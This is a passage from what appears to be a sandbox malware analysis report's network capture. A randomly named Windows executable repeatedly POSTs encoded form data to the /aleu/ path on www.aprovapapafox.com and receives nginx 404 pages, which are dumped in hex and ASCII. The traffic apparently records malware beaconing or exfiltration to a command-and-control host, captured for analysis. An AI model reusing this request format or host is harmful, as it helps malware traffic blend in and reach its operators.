3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                                                                          Apr 26, 2024 07:43:39.603122950 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                          Apr 26, 2024 07:43:39.603161097 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          26192.168.2.749752162.240.81.18802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:42.134452105 CEST785OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Origin: http://www.aprovapapafox.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 79 45 6e 4b 35 32 41 6d 63 50 51 39 4e 55 32 39 77 72 31 69 7a 62 30 4b 58 6c 4c 41 59 70 65 38 6d 34 72 46 45 75 70 4e 2b 67 45 46 68 4c 37 44 55 6f 45 4c 6b 55 4b 46 4e 4d 5a 6e 41 6a 6d 5a 7a 36 2f 6c 70 54 66 32 51 59 52 31 49 43 75 55 38 74 39 48 69 4e 57 52 57 67 66 4d 46 62 54 6b 43 45 64 2f 75 37 39 4d 31 49 4c 43 75 67 7a 6e 6c 51 6a 4b 2b 77 38 75 70 44 4c 30 71 35 44 4a 70 4a 6f 49 4e 53 30 4b 44 51 53 5a 67 79 51 4b 79 50 34 53 45 57 34 7a 6d 43 71 59 34 55 6d 4c 32 73 6a 43 2f 6d 79 4a 34 54 62 4c 61 50 76 62 45 6b 58 61 72 72 75 48 54 59 50 6a 4d 4f 7a 76 51 5a 71 6d 43 34 56 39 76 6a 57 4c 71 77 33 6f 38 33 67 38 4f 4e 56 33 2b 33 6b 3d
                                                                                                                                                                          Data Ascii: MzYDklf=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpe8m4rFEupN+gEFhL7DUoELkUKFNMZnAjmZz6/lpTf2QYR1ICuU8t9HiNWRWgfMFbTkCEd/u79M1ILCugznlQjK+w8upDL0q5DJpJoINS0KDQSZgyQKyP4SEW4zmCqY4UmL2sjC/myJ4TbLaPvbEkXarruHTYPjMOzvQZqmC4V9vjWLqw3o83g8ONV3+3k=
                                                                                                                                                                          Apr 26, 2024 07:43:42.330544949 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:42 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                                                                          Apr 26, 2024 07:43:42.330666065 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                          Apr 26, 2024 07:43:42.330717087 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          27192.168.2.749753162.240.81.18802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:44.861347914 CEST1798OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Origin: http://www.aprovapapafox.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 79 45 6e 4b 35 32 41 6d 63 50 51 39 4e 55 32 39 77 72 31 69 7a 62 30 4b 58 6c 4c 41 59 70 57 38 68 4c 6a 46 48 4a 31 4e 2f 67 45 46 39 62 37 47 55 6f 46 4f 6b 56 69 42 4e 4d 46 33 41 68 75 5a 79 66 72 6c 34 79 66 32 5a 59 52 31 58 79 75 56 78 4e 39 53 69 4d 36 56 57 68 76 4d 46 62 54 6b 43 47 46 2f 2b 61 39 4d 34 6f 4c 64 76 67 7a 72 7a 67 6a 75 2b 77 6c 62 70 43 4c 37 71 4a 6a 4a 71 70 34 49 41 48 41 4b 50 51 53 62 6c 79 51 53 79 50 6b 42 45 51 64 4b 6d 43 79 32 34 57 32 4c 30 35 69 75 71 48 53 54 69 31 33 7a 45 4d 43 33 48 57 61 75 68 6f 69 4c 52 5a 6a 64 49 4e 44 35 55 5a 69 38 57 66 56 35 36 68 6d 39 72 7a 7a 72 77 69 31 4c 4b 66 5a 4a 6f 6e 41 70 4d 75 36 52 30 69 47 34 39 53 6e 63 38 46 6e 55 4a 59 37 45 6e 47 4a 76 71 55 6b 37 61 51 45 77 56 6e 4b 33 4b 48 64 6a 42 6b 67 70 66 52 72 56 6b 58 55 76 33 55 73 5a 59 39 46 4b 55 72 30 2f 64 35 65 4e 4d 76 76 50 78 6a 67 37 66 75 78 2f 75 57 44 6a 77 56 69 4d 7a 42 46 6f 57 66 62 4b 76 66 46 4b 6f 6c 33 4a 5a 68 64 50 74 39 4d 39 59 32 36 35 78 63 54 51 65 63 74 77 7a 49 4b 67 48 6d 7a 76 68 6d 4f 5a 44 32 39 4b 6d 71 78 50 50 5a 76 77 6c 58 50 63 68 6b 39 39 34 49 37 50 4c 4f 73 56 5a 75 77 76 4e 55 31 36 45 34 42 6d 38 34 67 71 4c 77 4e 66 6f 62 67 51 55 51 52 72 6f 6f 53 2f 2b 71 61 2f 7a 50 30 59 62 6c 2f 42 2b 50 6e 75 4c 65 4a 78 75 61 75 63 30 64 2f 50 57 42 42 54 50 66 41 71 72 6e 53 51 6c 4a 6f 74 37 37 5a 62 68 61 4e 74 67 32 2f 6c 39 7a 57 74 72 58 4b 4c 32 58 78 4b 30 48 72 4f 43 38 71 33 57 57 43 43 45 4e 53 6c 46 72 34 4f 57 38 36 56 30 4a 61 38 78 69 6b 34 41 74 76 4e 54 46 75 77 32 4e 54 52 4f 37 68 6c 66 4e 35 57 71 6c 77 4d 33 50 65 44 41 34 53 36 58 37 50 44 74 63 74 4f 78 72 35 4f 47 4c 33 43 50 61 41 35 41 58 42 69 43 62 48 43 62 65 6e 5a 77 78 38 72 32 65 4e 4f 4d 41 33 56 6c 31 47 4d 55 6e 39 6c 76 57 44 43 72 42 2f 44 4f 65 78 57 32 2f 2b 33 54 48 4c 68 50 4a 64 39 78 56 6e 59 79 6d 57 2f 6a 31 4b 77 39 53 44 2b 6f 55 66 6c 71 53 44 4b 32 42 39 68 33 4e 71 42 79 78 52 68 4b 45 74 6e 78 66 4d 46 49 57 68 31 52 65 65 58 64 46 59 50 2f 2f 68 51 55 6f 67 7a 68 6a 4a 61 45 44 71 74 39 65 74 72 4f 59 4e 74 77 57 52 47 38 37 2f 65 4d 69 4a 64 48 51 72 73 31 6f 43 48 53 72 31 32 52 66 48 55 4e 61 75 38 56 70 6c 56 7a 7a 2b 4d 45 39 79 2f 6c 77 73 72 71 33 74 52 61 4d 62 59 31 4f 56 2b 42 53 79 4e 53 38 64 49 52 47 6f 79 2b 73 45 79 32 4a 79 45 38 44 71 30 2b 52 31 74 66 48 78 4c 69 36 72 77 77 58 71 32 5a 44 39 5a 48 74 59 51 79 4c 61 54 66 5a 36 66 39 35 79 70 70 62 76 64 32 52 76 75 46 46 31 78 4d 62 4d 74 63 4d 61 32 6a 2f 30 75 69 41 75 42 6d 69 61 6c 42 69 4e 7a 4a 52 68 4f 32 52 77 73 54 67 6e 5a 58 7a 44 45 47 6c 6d 73 66 77 37 77 31 56 53 43 6a 34 62 6b 2f 32 69 79 77 6c 56 67 51 5a 53 64 6c 49 4a 38 55 32 4a 50 30 6b 73 57 54 71 72 67 34 4b 6c 79 72 42 5a 4a 7a 65 2f 5a 5a 30 44 33 70 43 4a 43 6b 6b 42 6c 69 33 2f 6b 48 42 39 54 6d 39 70 78 63 72 54 41 66 39 6c 37 49 68 77 50 34 2f 6f 71 4f 71 43 52 30 53 53 74 58 70 55 6b 71 75 43 46 6e 64 33 47 46 55 50 37 7a 4f 34 6c 55 44 79 6c 6d 57 69 71 32 5a 2b 6f 7a 4c 56 41 57 4e 46 76 58 45 54 73 5a 50 79 6c 50 73 69 71 4a 6d 54 67 4a 70 51 34 54 74 33 7a 51 39 6c 76 53 74 72 4a 46 70 36 6d 6d 63 6d 72 4e 55 6c 4c 62 42 69 35 64 6b 5a 4a 41 64 62 76 56 64 4b 76 39 78 56 58 33 41 4d 68 66 4b 62 36 33 44 50 44 53 4f 6e 4e 69 52 32 63 6f 44 4b 52 44 78 79 35 56 2b 74 30 6e 75 74 54 76 77 55 4d 47 78 63 43 39 36 73 54 58 37 2b 69 4f 36 58 4c 70 56 65 6f 54 4d 59 5a 6c 42 45 6f 77 7a 35 73 4d 54 68 6e 69 30 42 67 69 2f 65 59 33 49 76 57 77 72 5a 42 63 34 6c 45 31 67 6b 57 57 4d 50 57 54 52 62 53 44 52 4f 58 57 59 4d 33 70 36 30 47 4e 44 50 55 63 38 43 66 5a 44 72 74 4e 45 43 6d 47 6c 72 4f 48 34 37 33 65 68 77 33
                                                                                                                                                                          Data Ascii: MzYDklf=rGJQ2I+FOOukyEnK52AmcPQ9NU29wr1izb0KXlLAYpW8hLjFHJ1N/gEF9b7GUoFOkViBNMF3AhuZyfrl4yf2ZYR1XyuVxN9SiM6VWhvMFbTkCGF/+a9M4oLdvgzrzgju+wlbpCL7qJjJqp4IAHAKPQSblyQSyPkBEQdKmCy24W2L05iuqHSTi13zEMC3HWauhoiLRZjdIND5UZi8WfV56hm9rzzrwi1LKfZJonApMu6R0iG49Snc8FnUJY7EnGJvqUk7aQEwVnK3KHdjBkgpfRrVkXUv3UsZY9FKUr0/d5eNMvvPxjg7fux/uWDjwViMzBFoWfbKvfFKol3JZhdPt9M9Y265xcTQectwzIKgHmzvhmOZD29KmqxPPZvwlXPchk994I7PLOsVZuwvNU16E4Bm84gqLwNfobgQUQRrooS/+qa/zP0Ybl/B+PnuLeJxuauc0d/PWBBTPfAqrnSQlJot77ZbhaNtg2/l9zWtrXKL2XxK0HrOC8q3WWCCENSlFr4OW86V0Ja8xik4AtvNTFuw2NTRO7hlfN5WqlwM3PeDA4S6X7PDtctOxr5OGL3CPaA5AXBiCbHCbenZwx8r2eNOMA3Vl1GMUn9lvWDCrB/DOexW2/+3THLhPJd9xVnYymW/j1Kw9SD+oUflqSDK2B9h3NqByxRhKEtnxfMFIWh1ReeXdFYP//hQUogzhjJaEDqt9etrOYNtwWRG87/eMiJdHQrs1oCHSr12RfHUNau8VplVzz+ME9y/lwsrq3tRaMbY1OV+BSyNS8dIRGoy+sEy2JyE8Dq0+R1tfHxLi6rwwXq2ZD9ZHtYQyLaTfZ6f95yppbvd2RvuFF1xMbMtcMa2j/0uiAuBmialBiNzJRhO2RwsTgnZXzDEGlmsfw7w1VSCj4bk/2iywlVgQZSdlIJ8U2JP0ksWTqrg4KlyrBZJze/ZZ0D3pCJCkkBli3/kHB9Tm9pxcrTAf9l7IhwP4/oqOqCR0SStXpUkquCFnd3GFUP7zO4lUDylmWiq2Z+ozLVAWNFvXETsZPylPsiqJmTgJpQ4Tt3zQ9lvStrJFp6mmcmrNUlLbBi5dkZJAdbvVdKv9xVX3AMhfKb63DPDSOnNiR2coDKRDxy5V+t0nutTvwUMGxcC96sTX7+iO6XLpVeoTMYZlBEowz5sMThni0Bgi/eY3IvWwrZBc4lE1gkWWMPWTRbSDROXWYM3p60GNDPUc8CfZDrtNECmGlrOH473ehw3
                                                                                                                                                                          Apr 26, 2024 07:43:45.058047056 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:44 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
